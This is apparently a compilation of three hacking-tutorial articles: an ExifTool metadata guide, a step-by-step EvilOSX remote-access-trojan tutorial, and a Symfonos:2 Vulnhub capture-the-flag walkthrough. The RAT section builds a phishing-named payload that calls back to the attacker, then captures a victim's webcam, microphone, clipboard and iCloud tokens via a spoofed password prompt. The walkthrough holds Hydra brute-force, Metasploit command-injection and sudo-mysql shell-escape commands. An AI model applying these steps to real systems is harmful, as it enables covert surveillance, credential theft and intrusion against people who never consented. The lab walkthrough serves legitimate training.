ExifTool : A Meta-Data Extractor

In this article, we’ll discover various methods to read, write and manipulate the meta-data information recorded in a variety of file types. In order to achieve this, we’ll be using a tool known as “ExifTool”.  EXIF is an acronym for Exchangeable Image File Format and it is a standard for the inclusion of metadata in certain file types.

Table of Content

·         Introduction to ExifTool

·         Installation

·         Usage of exiftool

o   Extract the Common Meta-Data Information

o   Extract the Specific Meta-Data Information

o   Extract GPS Co-ordinates

o   Extract Thumbnail Image

o   Extract metadata using specific keywords

·         ExifTool’s Verbose Mode

·         Writing the Meta-Data Information

·         Removing Meta-Data Information

·         Saving outputs

o   In HTML file

o   In Text File

·         Extracting ExifData from a Video file

Introduction

ExifTool is developed by Phil Harvey. It is a platform-independent Perl library coupled with a full-featured command-line implementation for reading, writing and manipulating the metadata across a broad range of files, particularly the JPEG images. This metadata may comprise a bunch of information such as the camera make, file type, permissions, file size etc., though it further offers more details about the photograph, like the exposure, the shutter speed and whether the flash fired or not. ExifTool probably gives us the simplest way to extract metadata from files, as it is free and an open-source program.

Installation

Exiftool is quite easy to deploy. It's just about hitting our Linux terminal and cloning the tool from GitHub.

git clone https://github.com/exiftool/exiftool.git

In addition, we need to install the necessary package for it.

sudo apt-get install libimage-exiftool-perl

So, we've mounted the tool in our system. Let’s take a closer look at it.                                                

Usage of Exiftool
To extract the entire metadata of a file, we just need to execute the given below command:
exiftool 

From the below image, you can now notice that we’ve got all the information drawn from our image file from the very basic to advance.

However, if we need to capture the ids along with exif tags in the Hexa-Decimal format, though we need to run the following command:

exiftool -H

From the below image, we can see that there is a lot of information stored within these Exif tags.

Extract the Common Meta-Data Information
Now execute the given below command which will provide us the output of the most common Exif tags of the image file.

exiftool  –common

Extract the Specific Meta-Data Information
We can list a particular meta information of our image file by simply executing the command given:

exiftool  -tagname  -tagname 

From the below image, we get our desired output displayed along with their respected tagnames in a list type format.

Extract GPS Co-ordinates
The photographs we capture using our smartphones or camera have GPS coordinates embedded as metadata in the image files. To obtain this, we just need to fire the command given below:

exiftool  | grep GPS

Here we got the GPS Position, now just copy and paste this complete coordinate information over Google Maps and we will get the exact location of the camera when the picture was taken.

Extract Thumbnail Image
Thumbnails are the original preview images basically compressed. These are just created to open the original images more quickly and act as place holders to them. In order to extract these thumbnail images, we just need to execute the following command:
exiftool  -ThumbnailImage (filename) > (Outout filename)
Here we can see that the thumbnail.jpg file is extracted from the test.jpg image.

Extract metadata using specific keywords
The following command will assist us to extract the metadata information associated with some specific keywords.
exiftool  “-*keyword*”
From the below picture, we can see that our fired command displays all tags with names containing the word "Image" from the file.

ExifTool’s Verbose Mode
Verbose mode generates extended information i.e. when we add [-v] to the exiftool command it will display us the comprehensive data about the process that it is performing.
exiftool  -v

Writing the Meta-Data

ExifTool provide us a great power to write most of the information on the EXIF tags, that anyone might want to alter, but some tags are protected because they describe the image's physical characteristics that we can't change with ExifTool, such as compression.  Also, other tags like the GPS, the MakerNotes, these information can be edited.

To manipulate the exif data we need to execute the following command:

exiftool  -Make= “HackingArticles” 

Here we can see that the information stored in the “Make” tag is replaced from “OPPO” to “HackingArticles”. While writing the information, ExifTool’s script automatically preserves the original file by adding "_original" to the end of file name.

Removing Meta-Data Information
We have only extracted or manipulated the exifdata so far, but what if we want to remove or delete all the metadata from an image file. Just execute the following below command, let's see how this works:
exiftool  -all= 
It shows 1 image files uploaded. The "test.jpg" exifdata has been removed effectively. Although let's attempt to extract the metadata from "test.jpg" again, hence we’re just getting the basic information of the image and the rest is deleted.

Saving outputs in Multiple Format

1.      In HTML file

We will save the ExifTool’s output in an HTML file in order to maintain the records and for better readability. To do this we will use the parameter “-h” along with the exiftool’s command and save the results in a file with .html extension.
exiftool  -h (filename) > (output.html)

Here, we can see test.html file is generated. Although we just need to open it to check our exifdata output in any of our browsers.

2.       In Text File

We can even export our exifdata to a text file similar to the output of the HTML. To achieve this, we simply need to execute the following commands:

exiftool (filename) > (outputexif.txt)

Further we can also monitor our output either by opening it in any of the text editors or by simply running the command: 

cat

Extracting ExifData from a Video file
ExifTool not only extract metadata from the jpg file format but can also read and write in a variety of files. To know more click here.
We will now extract the entire meta-data information from a mp4 video file. To extract this, we will run the basic exiftool’s command i.e.
exiftool

Conclusion

This was Exiftool's complete usability guide as a meta-data extractor. It is user-friendly and convenient because of its simple command-line implementation. It has thus become one of the best tools to extract meta-data data from a variety of file formats.

EvilOSX-RAT for MacOS/OSX

In this article, we will learn to use EvilOSX tool which is a Remote Administrator tool (RAT ) for initialising foothold on MacOS/OSX like platform . It can dramatically increase access in a matter of seconds.

Table of Content

·         Introduction
·         Installation
·         Usage in Exploitation
·         Usage in Post-Exploitation

·         System Info

·         Webcam

·         Retrieve iCloud auth tokens

·         Microphone

·         Clipboard

EvilOSX is an evil RAT (Remote Administrator Tool) designed to work upon macOS / OSX Platforms. It was developed by Marten4n6. Its backbone is famous Empire Framework Project. This project can be modified to be used on Rubber Ducky. This toolkit is fully packed with features. It was designed on the module system that made the debugging, improvements and addition of other modules easy. Also being developed in python it provides easy to be run across different attacking platforms.

Installation

The installation of the EvilOSX RAT on the Attacker machine, which in our case in Kali Linux is pretty simple. To begin with we will visit the EvilOSX GitHub Page. After getting the git link, we are going to clone the EvilOSX to our attacker machine using the git clone command.

git clone https://github.com/Marten4n6/EvilOSX.git

After cloning the EvilOSX, we traversed in the newly created directory created with the name of EvilOSX. Now, the tool has some predefined requirements that are required in order to make the tool function properly. Being a python developed tool, we will use the “pip” to install those requirements. These requirements are given by the author in the form of a text file which we used to install them.

pip install -r requirements.txt

Usage in Exploitation

Since we have successfully installed all the predefined requirements, it time to run this tool and gain control over some macOS devices. Now to exploit, we need a payload. To create this payload, we will use the start.py file with the builder parameter.

python start.py --builder

After running the script, it asked us to enter following information:

·         the Server host, here we entered our Attacker Machine IP Address (Kali Linux).

·         Next, it asked us for a port, this can be any random port.

·         After this, we are asked for the location of the location of the payload.

·         Next, we have to choose if we want EvilOSX to work upon the rubber ducky or not. Enter 0 for otherwise.

·         Furthermore, we are asked to choose the loader, leave it default.

·         After that we are asked to name the payload so as phish the user.

After all these choices, a launcher is created as shown in the image given below.

Now we can use any method to share this launcher or payload to the victim. In our case we used a python HTTP server  to get this file to the victim system. This file is downloaded on the victim system and then after providing the proper permissions the payload is executed as shown in the image given below.

chmod 777 Launcher-39q1q9.py

./Launcher-39a1a9.py

While we are executing the Launcher on the victim, we have to perform some actions on the attacker machine simultaneously. We are going execute the start.py again but this time in the CLI mode. Here we have to specify the port that we used while creating the launcher as the parameter as shown in the image.

python start.py –cli --port 4545

Post-Exploitation

After running the start.py script in the previous steps simultaneously with the launcher on the victim machine, we have successfully infiltrated the Victim MacOS system. The terminal converts in a framework as shown in the image. We can configure a page to shown upon the running. Type in help to show a list of working commands. We can see the list of active bots by using the command bots. To establish a connection to a bot, use connect command followed by the number which in this case is 0. To see the list of available modules we use modules command.

To use a module, just type in “use” followed by the module name. As there are a bunch of available modules, we are demonstrating a bunch of them here for reference. You can try them all at your convenience.

System Info

To get a brief summary of the system, we can use the get info module. This gives us the System Version, Model of the MacOS device. We also get the Battery status in case it is a Laptop. We have the name of the Wi-Fi Network it is connected to. It also tells us the privileges the current account has as well as the status of the FileVault.

Webcam

Now, we will try to grab a snap from the webcam of the MacOS device. To do this we will need to use the webcam module. It gives us a warning that there a green LED will show near the camera.

We have successfully captured a snap from the victim’s webcam as shown in the given image.

Retrieve iCloud auth tokens

We can extract the iCloud Authentication that contains information related to the AppleID linked to the device. However, this will first show a prompt on the victim system.

After agreeing to continue, a prompt will pop us as show in the image given below. This is masquerading as a genuine prompt that will spoof the victim and make him enter the password.

After the victim enters password, we will successfully capture the mail ID liked to the device as well as the access tokens as shown in the image given below.

Microphone

We can also capture the audio from the victim device using the microphone module. After running the command use microphone, we are asked to enter the time in seconds to record the audio from the microphone of the victim device and also the name of the service that would show up in the verification prompt.  

Here we entered 5 seconds, and we left the name of service to be blanked which made the RAT to take it as random sting as shown in the given image. A permission prompt pops up on the victim system asking for the permission to access the microphone.

After allowing the we have the recorder audio in the mp3 format saved on out attacker machine in the tmp directory.

Clipboard

We can also sniff the clipboard data from the victim machine. To do this we will have to use the clipboard. This will start the sniffer on the victim machine for the specified time in seconds. After starting the sniffer, any text that the victim will copy can be viewed as shown in the image given below.

Conclusion

 EvilOSX has a lot of uses, and the attention to detail in automating certain exploits makes it a great dedicated tool for OSX. The ease with which it works and attacks is remarkable, we can launch phishing attack to escalate privileges or trick a user into letting us deeper into the system. It’s a great tool and amazing to use as it traverses itself to connect apple devices.

Symfonos:2 Vulnhub Walkthrough

Today we are going to take another CTF challenge from the series of Symfonos. The credit for making this VM machine goes to “Zayotic” and it is another boot2root challenge where we have to root the server and capture the flag to complete the challenge. You can download this VM here.

Security Level: Intermediate

Penetrating Methodology:

1.      Scanning

·         NMAP

2.      Enumeration

·         Enum4Linux

3.      Exploitation

·         Smbclient

·         Hydra

·         Msfconsole

4.      Privilege Escalation

·         Exploiting Sudo rights

Walkthrough:

Scanning:

Let’s start off with the scanning process. This target VM took the ip address of 192.168.1.102 automatically from our local wifi network.

Then we used Nmap for port enumeration. We found that port 21,22, 80,139 and 445 are open.

nmap –p- –A 192.168.1.102

Enumeration:

As port 80 is open, we tried to open the IP address in our browser but we didn’t find anything useful on the webpage. We also tried dirb and other directory brute forcing tools but couldn’t find anything.

For further enumeration we used Enum4Linux tool and found some useful information.               

We found a shared directory named anonymous.

To confirm our finding we took the help of smbclient with empty password to list the shared resources of the target machine and got the same result.

Inside the anonymous directory there is another directory named backups. Inside the backups directory we got a log.txt file. So we downloaded the same file with get command.

smbclient –L 192.168.1.102

smbclient //192.168.1.102/anonymous

ls

cd backups

get log.txt

After opening the log.txt file in our local machine we got a username aeolus.

Exploitation:

So far we have got a username aeolus, so we tried to bruteforce it with hydra and after a long wait we successfully got a password sergiotaemo.

hydra –l aeolus –P /usr/share/worlists/rockyou.txt 192.168.1.102 ssh

Now we have a username and a password and we already know that there  ssh service running on the target machine. We tried to ssh login the target using msfconsole and were successfully able to do so.

use auxiliary/scanner/ssh/ssh_login

set rhosts 192.168.1.102

set username aeolus

set password sergiotaemo

exploit

From the ifconfig command we got a little hint that the target machine is listening on the localhost ip only.

So we used netstat command to check for the ip address and ports the target machine is listening on and found that web service (8080) is allowed for localhost only.

So what we did is we used port forwarding to access the port 8080 of the target.

netstat

portfwd add  -l 1234 –p 8080 –r 127.0.0.1

After that we were able to access the webservice running on port 8080. On the webpage we found it is running an LibreNMS web application.

We searched for any exploit available for the LibreNMS application in metasploit and found one command injection exploit available.

Using this exploit we were able to get a meterpreter session of the user LibreNMS.

search librenms

use exploit/linux/http/libre_addhost_cmd_inject

set rhost 127.0.0.1

set rport 1234

set lhost 192.168.1.103

set username aeolus

set password sergiotaemo

exploit

Privilege Escalation:

To get to the root shell we checked for the sudoer permissions for the librenms user and found that this user can run mysql command with no password. So we leveraged this to our advantage and run /bin/sh to get the root shell.

Once we got the root shell we traversed to the root directory and opened the proof.txt file to complete the challenge.

sudo –l

sudo mysql –e ‘\! /bin/sh’

id

cd /root

cat proof.txt